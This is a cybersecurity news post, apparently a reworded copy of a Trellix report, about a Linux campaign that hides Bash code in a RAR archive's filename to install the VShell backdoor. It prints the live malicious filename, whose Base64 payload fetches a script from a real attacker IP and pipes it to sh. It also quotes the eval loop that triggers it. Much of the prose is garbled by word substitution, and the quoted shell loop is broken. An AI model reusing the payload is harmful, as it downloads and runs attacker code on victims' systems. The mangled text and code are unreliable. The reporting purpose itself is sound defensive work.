Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New Linux Malware With Weaponized RAR Archive Deploys VShell Backdoor

New Linux Malware With Weaponized RAR Archive Deploys VShell Backdoor

Posted on August 22, 2025August 22, 2025 By CWS

Linux environments, lengthy thought of bastions of safety, are dealing with a complicated new menace that challenges conventional assumptions about working system security.

A not too long ago found malware marketing campaign exploits an ingenious assault vector that weaponizes RAR archive filenames to ship the VShell backdoor, demonstrating how attackers are evolving past standard exploitation strategies to focus on scripting patterns and file metadata.

The assault begins with a seemingly innocuous spam electronic mail disguised as a magnificence product survey invitation, providing a small financial reward to entice victims.

In contrast to conventional phishing campaigns that concentrate on credential theft or model impersonation, this social engineering strategy exploits person curiosity whereas delivering a malicious RAR archive attachment.

The archive comprises a file with a specifically crafted filename that serves as a dormant payload, ready to execute when processed by frequent shell operations.

What makes this assault significantly insidious is its exploitation of harmful patterns prevalent in Linux shell scripts.

Trellix researchers recognized that the malicious filename comprises embedded Bash-compatible code designed to execute instructions when interpreted by the shell throughout routine operations akin to listing enumeration or file itemizing.

The filename itself acts as a payload set off, bypassing conventional safety defenses that sometimes deal with file content material relatively than metadata.

The weaponized filename follows a posh construction that leverages shell command injection rules.

When extracted, the archive reveals a file named ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash, which can’t be manually created by way of regular shell enter as a consequence of its particular characters being interpreted as command syntax.

This filename was doubtless crafted utilizing exterior instruments or programming languages to bypass shell enter validation.

An infection Mechanism and Execution Chain

The an infection triggers when shell scripts course of the malicious filename by way of frequent operations like for f in *; do eval “echo $f”; completed.

Malware an infection stream (Supply – Trellix)

A number of set off vectors exist, together with file itemizing operations with eval capabilities, discover instructions with eval parameters, and xargs processing with shell enlargement.

The embedded payload makes use of a multi-stage strategy the place the filename evaluates to a Base64-decoded command piped on to bash.

As soon as triggered, the preliminary stage downloads a second-stage script that detects system structure and fetches the suitable ELF binary for x86, x64, ARM, or ARM64 techniques.

The ultimate payload, VShell, operates completely in reminiscence utilizing fexecve() to keep away from disk-based detection whereas masquerading as legit kernel threads like [kworker/0:2].

This subtle evasion approach demonstrates the evolution of Linux-targeted malware towards extra stealthy, memory-resident operations that problem conventional safety paradigms.

Increase your SOC and assist your group defend your online business with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Archive, Backdoor, Deploys, Linux, Malware, RAR, VSHell, Weaponized

Post navigation

Previous Post: Hundreds Targeted in New Atomic macOS Stealer Campaign
Next Post: Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices

Related Posts

North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials Cyber Security News
UNC3886 Actors Know for Exploiting 0-Days Attacking Singapore’s Critical Infrastructure UNC3886 Actors Know for Exploiting 0-Days Attacking Singapore’s Critical Infrastructure Cyber Security News
Microsoft Confirms Teams Outage for Users, Investigation Underway Microsoft Confirms Teams Outage for Users, Investigation Underway Cyber Security News
NVIDIA Merlin Vulnerabilities Let Attackers Execute Malicious Code and Trigger DoS Condition NVIDIA Merlin Vulnerabilities Let Attackers Execute Malicious Code and Trigger DoS Condition Cyber Security News
Formbook Malware Delivered Using Weaponized Zip Files and Multiple Scripts Formbook Malware Delivered Using Weaponized Zip Files and Multiple Scripts Cyber Security News
Record-breaking 11.5 Tbps UDP Flood DDoS Attack Originated from Google Cloud Platform Record-breaking 11.5 Tbps UDP Flood DDoS Attack Originated from Google Cloud Platform Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Rapid SSH Worm Exploits Linux Systems with Credential Stuffing
  • Odido Telecom Hacked: 6.2 Million Accounts Compromised
  • Lazarus Group Targets npm and PyPI with Malicious Packages
  • DragonForce Ransomware Group’s Expanding Cartel Operations
  • North Korean Hackers Exploit AI for Enhanced Cyber Attacks

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News